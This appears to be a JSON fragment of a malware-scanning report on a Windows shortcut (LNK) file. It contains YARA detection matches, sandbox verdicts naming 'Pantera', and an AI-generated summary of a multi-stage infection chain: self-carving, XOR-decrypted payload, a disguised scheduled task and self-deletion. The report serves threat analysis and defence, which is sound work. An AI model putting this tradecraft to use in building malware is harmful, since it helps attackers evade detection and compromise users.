"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1780245601,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Archive_in_LNK",
"match_date": 1780245601,
"description": "Identifies archive (compressed) files in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Execution_in_LNK",
"match_date": 1780245601,
"description": "Identifies execution artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "MSOffice_in_LNK",
"match_date": 1780245601,
"description": "Identifies Microsoft Office artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 64
},
"C2AE": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "C2AE",
"malware_names": [
"Pantera"
],
"confidence": 50
}
},
"tlsh": "T1FDC302192BF91410E2B36E3D5C7C05A74A5CB43769B1BCAD40A0A5CC69E1BD2E01FBB6",
"unique_sources": 2,
"last_modification_date": 1780843089,
"type_tags": [
"windows",
"lnk"
],
"crowdsourced_ai_results": [
{
"category": "code_insight",
"source": "palm",
"verdict": "malicious",
"analysis": "This highly malicious LNK file initiates a sophisticated multi-stage infection chain designed to execute arbitrary payloads and establish persistence. It first launches cmd.exe to locate and execute PowerShell dynamically. The PowerShell script identifies its own host LNK file on disk by filtering for its precise file size (122,444 bytes). It then performs file-carving operations directly on itself: first, extracting an embedded decoy XLSX document starting at offset 0x12AA and opening it to distract the user; second, extracting an encrypted payload from offset 0x1C03C. This payload is decrypted in memory using an XOR operation (key 0xBF), written to a hidden directory, and extracted via the native 'tar' utility. The script subsequently sets up persistence by executing obfuscated Scheduled Task PowerShell commands (constructed dynamically to evade detection) to register a task named 'Intel(R) Ethernet2 Connection 2509-PM'. This task is configured to execute the decrypted 'WCF35Setup.js' script using wscript.exe every 16 minutes. Finally, the LNK file performs self-deletion and cleans up the intermediate payload files to hinder forensic analysis.",
"id": "ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25-file-palm"
}
]
}
}
}